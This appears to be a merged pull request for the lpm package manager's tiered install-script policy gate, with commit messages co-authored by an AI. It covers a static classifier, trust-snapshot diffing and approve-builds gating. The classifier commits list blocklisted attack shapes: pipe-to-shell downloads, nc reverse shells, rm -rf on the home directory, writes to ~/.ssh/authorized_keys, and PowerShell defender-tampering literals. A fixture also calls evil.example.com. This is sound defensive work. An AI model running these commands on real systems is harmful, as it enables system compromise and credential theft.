Phase 46.0 — tiered script-policy gate (v0.23.0 released)#7
Merged
Conversation
…, BlockedPackage fields
Adds the persisted-schema primitives for Phase 46's tiered triage gate
(plan §6). No BUILD_STATE_VERSION bump: additions are Option<T> with
serde defaults, so pre-46 and Phase-46 readers are mutually compatible.
New types in lpm-security:
- StaticTier enum (green | amber | amber-llm | red), kebab-case wire
- ProvenanceSnapshot { present, publisher, workflow, cert_sha256 }
BlockedPackage extensions (ownership per §11 field-ownership rule):
- static_tier — populated by P2 static classifier
- provenance_at_capture — populated by P4 provenance drift
- published_at — populated by P1 metadata plumbing
- behavioral_tags_hash — populated by P1 metadata plumbing
Reader check relaxed !=-> `>` so future minor additions don't
invalidate existing .lpm/build-state.json. Bump policy documented on
BUILD_STATE_VERSION: only breaking changes warrant a bump.
Tests:
- StaticTier kebab-case serialization, round-trip, rejection of
camelCase + unknown variants
- ProvenanceSnapshot full + absent + partial parse + strict equality
- BlockedPackage mutual-compat both directions (v1 reader on
Phase-46-written file; Phase-46 reader on v1-written file)
- Reader rejects state_version > BUILD_STATE_VERSION; accepts equal
Full-workspace CI gate: clippy -D warnings clean, fmt clean,
3713/3714 tests pass (1 unrelated perf-threshold flake in lpm-task
filter::eval, different test each retry — load sensitivity, not a
regression).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ge flags
Adds the second P1 chunk: consolidated script-config loader, the new
policy-mode enum, and the CLI flag surface (plan §5.4 + D22). No
execution-semantics change yet — P1 only plumbs the resolved policy
through; tier-aware execution lands in P6 after the sandbox (D20).
New module: crates/lpm-cli/src/script_policy_config.rs
- ScriptPolicy enum (Deny | Allow | Triage), kebab-case wire, serde
default = Deny
- ScriptPolicyConfig { policy, auto_build, deny_all, trusted_scopes }
— one package.json pass for all four script-related keys
- collapse_policy_flags(): combines --policy / --yolo / --triage into
a single Option<ScriptPolicy>, trusting clap's conflicts_with_all
for the mutual-exclusion invariant
- resolve_script_policy(): full precedence chain
CLI > package.json > ~/.lpm/config.toml > default (deny)
CLI surface on both `lpm install` and `lpm build`:
- --policy=deny|allow|triage (canonical)
- --yolo (alias for --policy=allow)
- --triage (alias for --policy=triage)
Mutual-exclusion enforced at clap layer via conflicts_with_all;
invalid --policy values produce an actionable error naming the value
and the accepted list.
Consolidation: deleted the two ad-hoc script-config readers:
- read_auto_build_config (install.rs:5480) → ScriptPolicyConfig.auto_build
- read_deny_all_config (build.rs:838) → ScriptPolicyConfig.deny_all
Their dedicated tests are removed; equivalent coverage lives in
script_policy_config::tests (15 tests: kebab parsing, all-four-keys
load, explicit-deny-vs-unset distinction, malformed JSON, invalid
value silent fallthrough, full precedence chain).
Verified end-to-end:
- `lpm install --help` renders all three flags with precedence doc
- `lpm install --yolo --triage` → clean clap conflict error
- `lpm install --policy=garbage` → actionable message with valid list
Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1695/1695 tests pass on touched crates (lpm-security + lpm-cli). The
lpm-task filter::eval perf-threshold tests flake under parallel load
across the whole workspace; isolated serial re-run passes 168/168,
confirming load sensitivity rather than a regression.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…criptPolicy typos Addresses two Medium findings from the third-round audit of the P1 CLI-surface commit (a15cbd3): Finding 1 — Help text promised behavior that doesn't exist yet. Previous copy on --policy / --yolo / --triage described execution semantics ("run every script without gating", "greens auto-approve in sandbox") that land in a later phase; today these flags are accepted, resolved, and logged only. Users running `lpm install --yolo` today would reasonably expect scripts to run and be confused when nothing changed. Rewrote help copy on both install and build to open with "Status in this build (Phase 46 P1): flag accepted and logged; does NOT change execution behavior yet" and follow with what each value *will* do. Lets CI / scripts opt in to future behavior now without misleading the current UX. Finding 2 — Invalid package.json > lpm > scriptPolicy silently ignored. Previous behavior: a typo in a team-shared manifest fell through to each developer's ~/.lpm/config.toml or the default, silently producing per-developer policy divergence. This is the wrong failure mode for shared config. ScriptPolicyConfig now carries `policy_parse_error: Option<String>`: when `scriptPolicy` is present as a string but doesn't parse, this field holds the offending input (loader still returns `policy: None` so precedence falls through to global / default — the resolver's contract is unchanged). Install + build handlers check the field and emit `output::warn` with the value and accepted list when not in JSON mode, so a typo is user-visible on every install. Tested live: `package.json` with `"scriptPolicy": "invalid-typo"` produces: ▲ package.json > lpm > scriptPolicy: invalid value 'invalid-typo' (expected one of: deny, allow, triage); falling back to user config / default Architecture refactor: resolve_script_policy(cli, &Path) → resolve_script_policy(cli, &ScriptPolicyConfig). Callers now load the config once at handler entry, inspect policy_parse_error, then pass the loaded config to the resolver. De-duplicates the two loader calls per invocation and keeps warning-emission a caller concern (loader has no knowledge of JSON mode or color output). Tests: - Renamed from_package_json_invalid_script_policy_is_silent_none → ..._surfaces_parse_error; asserts both policy==None AND policy_parse_error==Some(input) - New from_package_json_valid_script_policy_has_no_parse_error - New from_package_json_absent_script_policy_has_no_parse_error - New resolve_ignores_parse_error_uses_fallthrough pins the resolver contract: parse-error does not block resolution - Existing resolve_* tests updated for new signature Finding 3 (helpers still use lenient name-only gate) is addressed in the next planned P1 chunk (helper migration) per the field-ownership discipline in the plan's §11 P1 scope. Full-workspace CI gate: clippy -D warnings clean, fmt clean, 18/18 script_policy_config tests pass. lpm-task filter::eval perf-threshold flakes under parallel load continue to be unrelated to these crates. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ve policy
Addresses the Low-severity wording drift from the fourth-round audit:
the scriptPolicy typo warning was emitted BEFORE resolution and always
said the value was "falling back to user config / default". That is
only true when no CLI override is present. When the user passes
--policy, --yolo, or --triage, the CLI override is what actually
wins — so the warning's tail was misleading in that case.
Fix: move warning emission to AFTER `resolve_script_policy` and
include the resolved value in the message. One message works
across all three precedence paths:
no CLI override → "…effective policy: deny" (or global, if set)
--yolo → "…effective policy: allow"
--policy=triage → "…effective policy: triage"
Ordering is preserved: invalid CLI flag values (e.g. --policy=garbage)
still error out via `collapse_policy_flags` BEFORE we'd emit the
package.json warning, so the CLI error takes precedence over the
manifest warning as before.
Tested live:
▲ package.json > lpm > scriptPolicy: invalid value 'invalid-typo'
(expected one of: deny, allow, triage); this key was ignored —
effective policy: <deny|allow|triage>
Workspace gate clean: clippy -D warnings, fmt, 1698/1698 tests pass
on touched crates.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…cripted_packages_trusted use strict gate
Closes audit Finding 3 (third-round review). Pre-existing drift:
`build::run` uses `can_run_scripts_strict` (binds to
{name, version, integrity, script_hash}), but both the install-time
hint and the auto-build "all trusted" predicate used the lenient
`policy.can_run_scripts(name)` gate. Consequence: a drifted rich
binding was shown as `trusted ✓` in the install hint AND satisfied
the auto-build predicate, even though `build::run` would then skip
it — confusing UX at best, silent trust-drift bypass at worst.
Both helpers now use the same four-way TrustMatch handling as
`build::run` at build.rs:133:
- Strict → trusted
- LegacyNameOnly → trusted (build::run still runs with deprecation)
- BindingDrift → NOT trusted (behavior fix)
- NotTrusted → NOT trusted
OR-composed with is_scope_trusted, matching build::run exactly.
Signature change: both helpers' `packages` argument is now
`&[(String, String, Option<String>)]` (name, version, integrity).
Three call sites in install.rs updated to thread integrity through
(it's already on the existing InstallPackage struct — one field, no
data-flow refactor needed).
Extracted `scriptable_package_rows()` as a pure helper that
`show_install_build_hint()` now wraps; the pure helper is the test
surface for reviewer-prescribed regression case A.
Tests (reviewer prescription + positive control):
A. show_install_hint_drifted_rich_binding_is_not_trusted — drifted
rich binding MUST NOT be shown as `trusted ✓`. Pre-migration
this asserted true against `is_trusted`; now asserts false.
B. all_scripted_packages_trusted_false_on_drifted_rich_binding —
drifted rich binding MUST NOT satisfy the auto-build predicate.
Pre-migration: true; now false.
Positive control: scriptable_rows_strict_match_is_trusted — a rich
binding whose scriptHash matches the on-disk hash IS trusted.
Proves the drift tests distinguish "drifted" from "no binding."
Three existing helper tests updated to the new tuple signature
(integrity: None preserves their semantics since they use legacy
bare-name `trustedDependencies` arrays, which parse as LegacyNameOnly
— treated as trusted by both old and new gates).
Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1701/1701 tests pass on touched crates (lpm-cli + lpm-security). The
lpm-task filter::eval perf-threshold tests continue to flake under
parallel load; serial re-run 168/168 confirms unrelated to this
migration.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…_hash populated on BlockedPackage Closes the first of the three remaining P1 chunks. The Phase 46 schema added optional `published_at` and `behavioral_tags_hash` fields to BlockedPackage (commit 474fc59) but left them always-None; this commit wires the producer that populates them from registry metadata. New machinery: - lpm-registry: BehavioralTags::active_tag_names() returns the canonical camelCase names of the 22 tag-fields that are true, sorted lexicographically. Static strings mirror the serde renames and the server-side behavioral-tags.js schema so the hash is portable. - lpm-security::triage: hash_behavioral_tag_set(&[&str]) produces a deterministic "sha256-<hex>" digest with NUL separators (adjacency- collision defense). Empty input hashes to a stable, non-empty value (SHA-256 of empty string); callers distinguish "no active tags" from "no metadata" at the call site. - build_state: BlockedSetMetadata + BlockedSetMetadataEntry types (keyed by (name, version)). New entry points compute_blocked_packages_with_metadata and capture_blocked_set_after_install_with_metadata consume the map. Existing signatures preserved as thin wrappers passing an empty metadata map — zero test churn across the ~30 callers that use them. Install pipeline (install.rs): - build_blocked_set_metadata() async helper iterates packages and fetches registry metadata via the existing TTL-cached client API. Extracts time[version] → published_at and versions[version] ._behavioralTags → hash_behavioral_tag_set. Returns empty map on errors (graceful degradation; must never fail install). - Primary install path calls the _with_metadata variant with the built map. Fast-path (run_link_and_finish) still uses the no- metadata wrapper — fields stay None there, which is documented degradation (the lockfile fast-path has no populated TTL cache). Tests (5 new in build_state::tests): - compute_with_metadata_forwards_published_at_and_behavioral_tags_hash - compute_with_metadata_missing_entry_leaves_fields_none (graceful) - compute_with_metadata_partial_entry_forwards_only_populated_half - backward_compat_wrapper_captures_with_empty_metadata - metadata_fingerprint_is_independent_of_metadata (design invariant: the blocked-set fingerprint is over blockable packages + their strict binding only, NOT over their metadata — registry churn must not re-fire the blocked-set suppression banner) Plus 6 new tests in lpm-security::triage::tests covering the hashing helper: sha256- prefix + fixed length, empty-input pinned digest, order sensitivity (caller contract), NUL-separator adjacency defense, determinism, subset-distinction. Full-workspace CI gate: clippy -D warnings clean, fmt clean, 1821/1821 tests pass on touched crates. Field ownership matches the Phase 46 plan §11 P1 table: published_at + behavioral_tags_hash are P1-owned; static_tier + provenance_at_capture remain None until P2 and P4. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Closes the second of the three remaining P1 chunks. Implements plan
§4.2: detect silent additions to `package.json > lpm >
trustedDependencies` between installs. Motivating case: a "bump dep"
PR that quietly grows the trust list gets flagged locally instead of
slipping past code review.
New module: crates/lpm-cli/src/trust_snapshot.rs
- TrustSnapshot { schema_version, captured_at, bindings } persisted
to `<project_dir>/.lpm/trust-snapshot.json`. BTreeMap-keyed for
deterministic on-disk ordering.
- SnapshotEntry { integrity, script_hash } — minimal 2-field
projection of TrustedDependencyBinding. Does NOT capture Phase 46
audit fields (approved_by, approved_by_model_exact) — those belong
to the manifest's audit trail, not the "did-the-set-change" diff.
- TrustSnapshot::capture_current pattern-matches the Legacy / Rich
variants directly rather than calling TrustedDependencies::iter
(which normalizes keys to the name-portion only and would collapse
per-version granularity).
- TrustSnapshot::diff_additions — keys in current not in previous,
sorted. Returns empty on "no previous" (first install). Deliberately
ignores removals (not a security concern) and same-key binding
changes (already handled by BindingDrift in the install path).
- Schema-versioned parallel to BuildState: SCHEMA_VERSION = 1; same
no-version-bump policy for additive field changes.
- format_new_bindings_notice produces the user-facing multi-line
notice pointing at `lpm trust diff` (the inspection CTA — ships
in chunk C).
- write_snapshot is atomic (temp-then-rename); crash safety matches
build-state.json.
Install pipeline (install.rs):
- Pre-install: after "Installing dependencies for X" and before the
lockfile fast-path branch, read prior snapshot, diff against
current manifest, emit notice via output::info. Suppressed in
--json mode (no stable JSON schema yet; agents get the same data
from `lpm trust diff` in chunk C).
- Post-install: snapshot write on BOTH the main path and the
run_link_and_finish fast path. The fast path is reached when only
trustedDependencies changed (lockfile still valid) so skipping
snapshot write there would leave the next install diffing against
stale state. Write failures are tracing::warn only — non-fatal,
graceful degradation.
Tests (16 in trust_snapshot::tests):
- capture_current: empty, rich bindings, legacy bare-name keying
- diff_additions: no previous, additions detected, removals ignored,
binding-changes ignored, multi-addition sort invariant
- format_new_bindings_notice: empty → None, populated → CTA present
- read/write: round-trip, missing file, malformed JSON, newer
schema_version refused, atomic-write leaves no .tmp file
- End-to-end regression (audit prescription A):
install_n_writes_snapshot_install_n_plus_1_detects_addition —
simulates the full flow from snapshot-write through diff on the
next install; asserts both the additions list and the rendered
notice include the poisoned-PR addition.
Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1837/1837 tests pass on touched crates. Field ownership: P1 owns
.lpm/trust-snapshot.json per plan §11 — done here.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…complete Closes the final P1 chunk. Adds the user-facing surface over the trust-snapshot persistence machinery (8c03c55) — inspection via `lpm trust diff`, active cleanup via `lpm trust prune`. New module: crates/lpm-cli/src/commands/trust.rs - TrustCmd clap subcommand enum with Diff and Prune variants. - compute_full_diff returns added / removed / changed entries across the snapshot → current manifest transition, ordered added-then-removed-then-changed with stable lexicographic sort within each class (matches the rendering convention). - compute_stale_keys extracts the NAME portion from Rich keys (`name@version`) via `rfind('@')` so scoped packages like `@myorg/pkg@1.0.0` resolve to `@myorg/pkg` correctly. Version drift (same name, different version) is NOT flagged as stale — that's BindingDrift territory. - remove_stale_from_manifest handles both Legacy (filter array in place) and Rich (remove map keys) shapes of trustedDependencies. - Atomic manifest writer (temp-then-rename) mirrors the snapshot writer's crash-safety pattern. - Stable JSON schema on `--json` with SCHEMA_VERSION = 1 per P9 telemetry discipline. `lpm trust diff`: - `--json` emits structured { added, removed, changed } arrays plus the snapshot's `captured_at` for agent consumption. - Human mode renders `+ added`, `- removed`, `~ changed` with per-field delta ("integrity: sha512-old → sha512-new") for changed entries. - Empty diff reports "unchanged since last install (<timestamp>)". `lpm trust prune`: - Reads lpm.lock to determine installed names; refuses to run if lockfile is missing. - `--dry-run` to preview; `--yes` for non-TTY; non-TTY without `--yes` is a hard error (prevents silent mutation in CI). - `--json` emits `{ stale_count, stale[], dry_run, mutated }`. - Confirmation prompt on TTY via cliclack. main.rs: - New `Trust { action: TrustCmd }` variant with inline subcommand dispatch following the `Global { action: GlobalCmd }` pattern already established in the codebase. Tests (13 in commands::trust::tests): - compute_full_diff: empty, added/removed/changed classification + ordering invariant, identical → empty - compute_stale_keys: rich entries by name (strips @Version), scoped package name extraction (last-@ rule), legacy bare names, empty manifest, version-drift-is-not-stale regression - remove_stale_from_manifest: rich map, legacy array, nonexistent key is no-op - write_manifest atomic-write-no-tmp-leak - End-to-end prune_removes_stale_entry_and_leaves_active_entry_intact (audit prescription B): real package.json + fake lockfile, invoke run_prune via tokio runtime, assert file contents post-mutation. Full-workspace CI gate: clippy -D warnings clean, fmt clean, 1850/1850 tests pass on touched crates (lpm-cli + lpm-security + lpm-registry). Phase 46 P1 IS COMPLETE. Branch phase-46 has 8 commits covering: - Schema extensions (474fc59) - ScriptPolicyConfig + --policy/--yolo/--triage flags (a15cbd3) - Audit honesty fixes: help text + scriptPolicy typo warning (403a041) - Audit v3: warning names effective policy (665e74b) - Helper migration: strict gate in show_install_build_hint + all_scripted_packages_trusted (107fde5) - Metadata plumbing: published_at + behavioral_tags_hash (f13541c) - Trust-snapshot persistence + diff notice (8c03c55) - lpm trust diff + lpm trust prune (this commit) Next phase: P2 static classifier. All P1 field-ownership obligations met per plan §11: - Schema extensions (done) - Helper migration (done) - Config consolidation (ScriptPolicyConfig done) - Metadata plumbing (published_at, behavioral_tags_hash done) - Trust-snapshot persistence (done) - lpm trust diff/prune (done) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… + error on malformed TD Closes two Low findings from the end-of-P1 audit: F1 — `lpm trust prune --json` emitted the structured output BEFORE the write, with an optimistic `mutated: true` that the subsequent non-TTY/confirmation guard could invalidate by erroring out. The JSON contract was unreliable for automation. Fix: restructure `run_prune` so at most ONE terminal output is emitted per invocation, always post-mutation (or post-decision-not-to-mutate): - empty stale → mutated: false, no write - dry-run → mutated: false, no write - non-TTY + !yes → Err before any output - write_manifest fails → Err propagates, no JSON emitted - success → mutated: true, emitted AFTER write_manifest returns Ok `mutated` is now an accurate post-condition, not a prediction. F2 — `extract_trusted_dependencies` used `unwrap_or_default()`, so a manifest with a malformed `lpm.trustedDependencies` value (typo, wrong shape, etc.) silently degraded to "empty set" — prune then reported "nothing to prune" and exited 0. The typed read path used by `trust diff` (via `lpm_workspace::read_package_json`) already errors on this; `trust prune` now matches that strictness. Fix: `extract_trusted_dependencies` returns Result<TrustedDependencies, LpmError>; propagates via `?` in run_prune. Error message names the offending key and the accepted forms (legacy array vs. Phase-4 rich map). Absent key path unchanged — still Ok(default). Tests (7 new in commands::trust::tests, bringing trust to 20/20): Unit: - extract_trusted_dependencies_absent_key_is_ok_default - extract_trusted_dependencies_valid_legacy_array_parses - extract_trusted_dependencies_valid_rich_map_parses - extract_trusted_dependencies_malformed_shape_errors (4 bad shapes exercised: number, string, bool, array-of-non-strings) End-to-end (filesystem-observable post-conditions — no stdout capture required, because file state on disk is the authoritative proof that the JSON emission matches reality): - run_prune_empty_stale_does_not_mutate_manifest — byte-identical pre/post, proves no spurious write when nothing is stale - run_prune_dry_run_does_not_mutate_manifest — same, with a real stale entry present and --dry-run honored - run_prune_malformed_trusted_deps_errors_before_any_write — F2 end-to-end: bad shape surfaces as LpmError + file unchanged Full-workspace CI gate: clippy -D warnings clean, fmt clean, 20/20 trust tests pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
New pure, deterministic classifier for lifecycle-script bodies.
Emits Green | Amber | Red only; AmberLlm is reserved for P8.
Classification semantics (P2 = classification-only per D20):
- Green: exact match of curated allowlist (node-gyp rebuild, tsc
[-b|-p path], prisma generate, husky [install], electron-rebuild,
node <safe-relative>.{js,cjs,mjs} where basename is NOT install.js
/ postinstall.js).
- Red: hand-curated blocklist — pipe-to-shell (curl|sh, wget|bash,
base64 -d|sh), node -e / --eval, iex / nc / netcat / ncat / eval,
nested package managers (npm/pnpm/yarn/bun/lpm/pip/gem/cargo/brew
install), rm -rf on ~/$HOME/absolute paths, chmod +x/777 outside
package, redirects into ~/.bashrc / ~/.ssh/** / /etc/** /root/**,
PowerShell literals (Invoke-Expression, FromBase64String,
Add-MpPreference), Unicode control chars (Trojan Source class).
- Amber: everything else, including compound commands AND network
binary downloaders (playwright install, puppeteer, cypress install,
electron-builder install-app-deps) per D18.
Pipeline ordering (per §4.1 with the review-round refinement):
1. Raw-string red prefilter (Unicode + PowerShell literals)
2. Quote-aware operator normalization (see below)
3. shlex tokenization (parse failure → Amber)
4. Tokenized red checks (MUST precede compound fallback so
curl … | sh → Red, not Amber)
5. Compound-operator detection (any &&, ||, ;, |, >, >>, <, <<, &,
( ), $(, backtick) → Amber
6. Green allowlist match
7. Fallback → Amber
Quote-aware operator normalizer fixes a review-round finding: shlex
splits on whitespace but does NOT recognize shell operators, so
`curl url|sh` tokenized as ["curl", "url|sh"] and silently
downclassified to Amber via the compound fallback. The normalizer
pads every UNQUOTED operator with surrounding whitespace before
shlex sees the string, tracks single-quote / double-quote /
backslash-escape state, and recognizes the four two-char operators
(&&, ||, >>, <<) as atomic units.
Contract: no execution semantics change. P2 populates static_tier
on BlockedPackage for UX annotation only; auto-execution of greens
is gated on P5 (sandbox) + P6 (tier-aware auto-run).
Ship:
- Adds shlex = "1.3" to workspace deps.
- 58 unit tests in static_gate::tests, including 7 regression tests
for the no-space operator finding (curl|sh, base64 -d|sh,
echo hi>~/.bashrc, tsc&&husky install, and three negative cases
covering quoted / escaped operator characters).
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- grep -r 'fancy-regex' crates/*/Cargo.toml ✓ (empty)
- cargo build --workspace ✓
- cargo nextest run --workspace --exclude ✓ (3834 pass;
lpm-integration-tests known flake
lpm-task perf_eval_glob
passes serially)
- cargo nextest run -p lpm-security ✓ (387/387)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Clippy's let_and_return fires on `manager_with` under `cargo clippy --all-targets` (not on the CI gate, which runs `--workspace` only, so this has been silently red for anyone who flips on --all-targets locally). One-line fix: return the struct literal directly. Surfaced while running the pre-merge CI gate for phase-46 P2 chunk 1 at --all-targets. Unblocks the lpm-auth clippy run; the remaining --all-targets errors live in lpm-cli test code (build_state.rs bool-literal assert_eq, trust.rs / trust_snapshot.rs needless struct update) and are out of scope here. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…harness
Ships the starter fixture corpus (91 scripts across 14 categories)
plus a one-test integration harness that classifies every entry
against its declared expectation.
Layout:
crates/lpm-security/tests/fixtures/postinstall-scripts/
├── README.md — naming / ship-criteria doc
├── expectations.json — [{id, expected, notes?}]
└── scripts/<id>.txt — one raw body per entry
Corpus composition (deliberately biased toward amber/red coverage;
Chunk 6 grows toward 500 real-world postinstalls):
green-* (20) — allowlist hits (tsc, node-gyp rebuild,
prisma generate, husky[install],
electron-rebuild, node <relative>.{js,cjs,mjs})
amber-d18-* (10) — D18 network binary downloaders
(playwright, puppeteer, cypress,
electron-builder, node install.js)
amber-compound-* ( 8) — compounds of otherwise-green commands
amber-novel-* (12) — out-of-allowlist commands (python,
make, cmake, gulp, npx, yarn build…)
amber-node-escape-* ( 5) — node with escaping paths (../, /abs,
~/, $HOME, no-ext)
amber-parse-fail-* ( 1) — unbalanced quote → shlex fails closed
red-pipe-* ( 5) — curl|sh / wget|bash / base64 -d|sh
red-eval-* ( 3) — eval, node -e, node --eval
red-nested-pm-* ( 8) — npm/pnpm/yarn/bun/pip/cargo/gem/brew
install
red-rm-* ( 4) — rm -rf ~ / / $HOME / ~/.ssh
red-chmod-* ( 2) — chmod outside package tree
red-redirect-* ( 3) — >> ~/.bashrc / ~/.ssh/authorized_keys
(including no-space regression)
red-nc-* ( 2) — nc / ncat reverse shell
adversarial-* ( 8) — §12.2 stress set: U+202E RTL override,
U+200D ZWJ, U+FEFF BOM,
Invoke-Expression, iex, FromBase64String,
Add-MpPreference, no-space pipe-bash
Harness (tests/static_gate_corpus.rs, one test, ~40ms):
- Loads manifest + each raw-body file, calls classify(), asserts
declared expectation matches actual tier for every entry.
- Hard-fails on any false-positive red (§4.1 ship criterion).
- Hard-fails if the classifier ever emits AmberLlm (contract
invariant: P2 owns Green|Amber|Red; AmberLlm is reserved for P8).
- Duplicate-id guard on manifest load.
- Prints per-run stats (total / green / amber / red + green-rate on
the real-corpus subset) so tuning during Chunks 3–6 has continuous
feedback. The ≥60% green-rate threshold is NOT asserted here —
starter corpus is biased low by design (current: 35%); threshold
flips to hard-gate in Chunk 6 once the corpus grows to 500.
Denominator for the ≥60% is pinned in the plan doc (§4.1 update in
a separate commit): green / (green + amber) over non-adversarial
entries, measured the same way the harness measures it today.
Unicode bytes verified on disk (xxd):
adversarial-001: E2 80 AE (U+202E RTL OVERRIDE)
adversarial-002: E2 80 8D (U+200D ZWJ)
adversarial-003: EF BB BF (U+FEFF BOM)
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- cargo build --workspace ✓
- cargo nextest run -p lpm-security ✓ (388/388)
- cargo nextest run --workspace ✓ (3834/3836;
--exclude lpm-integration-tests 2 failures are
the known lpm-task
perf_eval_* flake
under parallel load,
pass serially, not
in touched crates)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…-builds UI/JSON
Static-gate classification now runs at install-time blocked-set
capture and is persisted on every fresh BlockedPackage. Value
surfaces in both the human approve-builds card and the --json shape
so the existing review flow gains the P2 tier annotation
immediately.
lpm-security/triage.rs
- Adds StaticTier::worse_of — canonical worst-wins reducer
(Red > AmberLlm > Amber > Green). Symmetric, idempotent, fits
Iterator::reduce directly. 7 precedence tests.
lpm-cli/build_state.rs
- Replaces read_present_install_phases with
read_install_phase_bodies — returns Vec<(phase_name, body)> in
canonical EXECUTED_INSTALL_PHASES order. One read + parse of
package.json feeds both phases_present derivation and the
classifier; old helper had one caller and is deleted.
- compute_blocked_packages_with_metadata classifies each present
phase body via lpm_security::static_gate::classify, folds
worst-wins via StaticTier::worse_of, and writes the result to
BlockedPackage.static_tier. Populated unconditionally per plan
§5.1 (annotation works under deny/triage/allow). A freshly
computed BlockedPackage always has Some(tier); None indicates
persisted state predates P2.
- 8 new tests: read_install_phase_bodies order + empty-body skip +
error paths; worst-wins population for Green, Red, Green+Red→Red,
Green+Amber→Amber; always-Some invariant.
lpm-cli/commands/approve_builds.rs
- SCHEMA_VERSION: 1 → 2 (per plan §6.4). Version-history doc
captures the v2 delta.
- blocked_to_json emits "static_tier": kebab-case string or null.
null (not omitted) for v1 legacy state so agents can distinguish
"no tier known" from "field missing" without re-checking
schema_version per row.
- print_package_card renders `Static tier: <label>` with color
(green→green, amber/amber-llm→yellow, red→red). Absent means the
blocked state predates P2; no line is printed rather than
showing "unknown".
- tier_label_text + colored_tier_label split — pure helper is
unit-testable, color wrapper is separate. 8 new tests: schema
bump, every tier→JSON mapping, null-when-absent, label
distinctness, label prefix, colored-embeds-plain.
lpm-cli/tests/approve_builds_audit_regression.rs
- Two stdout-JSON contract tests pinned schema_version == 1;
bumped to 2 with inline comment pointing at this change.
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- cargo build --workspace ✓
- cargo nextest run -p lpm-cli ✓ (1436/1436)
- cargo nextest run --workspace --exclude ✓ (3856/3860;
lpm-integration-tests 4 failures are
the known lpm-task
perf_eval_* flake
under parallel
load; all 4 pass
serially in 0.28s,
not in touched
crates)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Completes the `script-policy=triage` UX contract from plan §11 P2:
bulk approval is restricted to the green tier. Non-green entries
must go through the interactive walk or single-package approval so
each gets explicit human review.
Refusal contract (contract with agents: "--yes refuses" prefix is
stable P2-onward for substring-matching on the error payload):
- Some(Green) → pass (still requires explicit --yes; auto-execution
is P6, gated on the P5 sandbox per D20).
- None → pass. Pre-P2 persisted state carries None; breaking
existing --yes muscle memory during a P1→P2 upgrade before the
next fresh install recaptures tiers would be a silent
regression. The next install populates tiers and from then on
the gate applies.
- Some(Amber | AmberLlm | Red) → refuse, list each refused
{name}@{version} + tier label, redirect to `lpm approve-builds`
interactive / `lpm approve-builds <pkg>` / `lpm approve-builds
--list`.
Gate placement: the enforce_tiered_yes_gate call sits BEFORE
emit_yes_warning_banner at approve_builds.rs:309. Emitting the
banner (human stdout + tracing::warn!) and then aborting would
corrupt log aggregators and the console with success-shaped output
for a no-op — the gate must refuse before any side effect. Manifest
write_back is similarly gated, so a refusal leaves package.json
byte-identical to its pre-call form (asserted by the e2e test).
Implementation:
- New pure helper `enforce_tiered_yes_gate(&[BlockedPackage])
-> Result<(), LpmError>` next to the existing tier-label helpers.
- Existing approve_builds e2e fixtures that used
`"postinstall": "node install.js"` were AMBER under Chunk 3 (D18
binary-fetcher convention) and would make --yes refuse. Switched
the 5 initial-install bodies to `"tsc"` (green) — the tests'
intent is state-machine transitions, not the specific body. The
drift-injection body at line 2341 (`"node install.js && curl
evil.example.com"`) stays because it's set AFTER approval and
never hits the gate.
Tests (12 new):
- 9 pure enforce_tiered_yes_gate tests: empty / all-green / all-None /
mixed green+None / single amber / single amber-llm / single red /
mixed (count accuracy + listing only refusals) /
error-message redirects to interactive path.
- 3 e2e tests via run(): amber refuses + manifest byte-unchanged,
all-green approves, None-tiered legacy state passes through.
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- cargo build --workspace ✓
- cargo nextest run -p lpm-cli ✓ (1448/1448)
- cargo nextest run --workspace --exclude ✓ (3870/3872;
lpm-integration-tests 2 failures are
the known lpm-task
perf_eval_* flake
under parallel
load; 4/4 pass
serially in 0.4s,
not in touched
crates)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Under `script-policy = "triage"`, `lpm install` emits a single-line
per-tier summary in place of the existing multi-line build hint.
`deny` and `allow` paths are unchanged. Line shape is stable
P2-onward (snapshot-tested):
script-policy: triage (N green / M amber / K red → lpm approve-builds)
Agents parsing the line have two stable anchors:
- prefix: `"script-policy: triage ("`
- suffix: `" → lpm approve-builds)"`
Helpers (build_state.rs):
- count_blocked_by_tier — returns (green, amber, red). AmberLlm and
None collapse into amber (conservative: unknown → needs review).
- format_triage_summary_line — deterministic formatter over the
count. Both shared with future --json install output so human and
machine shapes agree on the arithmetic.
Install-path wiring:
- run_with_options gains `script_policy_override: Option<ScriptPolicy>`
and at the show_install_build_hint site loads the project's
ScriptPolicyConfig, resolves against the override, and branches:
if effective == Triage → emit format_triage_summary_line; else →
legacy show_install_build_hint + output::info redirect.
- run_link_and_finish (the lockfile fast path) mirrors the same
branch at its own hint site. Both install code paths stay in
sync.
- run_add_packages and run_install_filtered_add forward the
override through to run_with_options.
- main.rs: preserves the collapsed CLI override separately so all
four install-dispatch sites forward it. Per-target resolution
re-evaluates against the target's package.json (matters for
workspace-filtered installs where the member may set its own
scriptPolicy).
Internal install callers (9 files: add, deploy, dev, doctor,
install_global, migrate, run, update_global, upgrade) pass `None`
— these don't expose --policy/--yolo/--triage flags and inherit
the project-config precedence.
Tests (7 new, all in build_state::tests):
- count_blocked_by_tier_empty_returns_zeros
- count_blocked_by_tier_counts_green_amber_red_distinctly
- count_blocked_by_tier_amber_llm_counts_as_amber
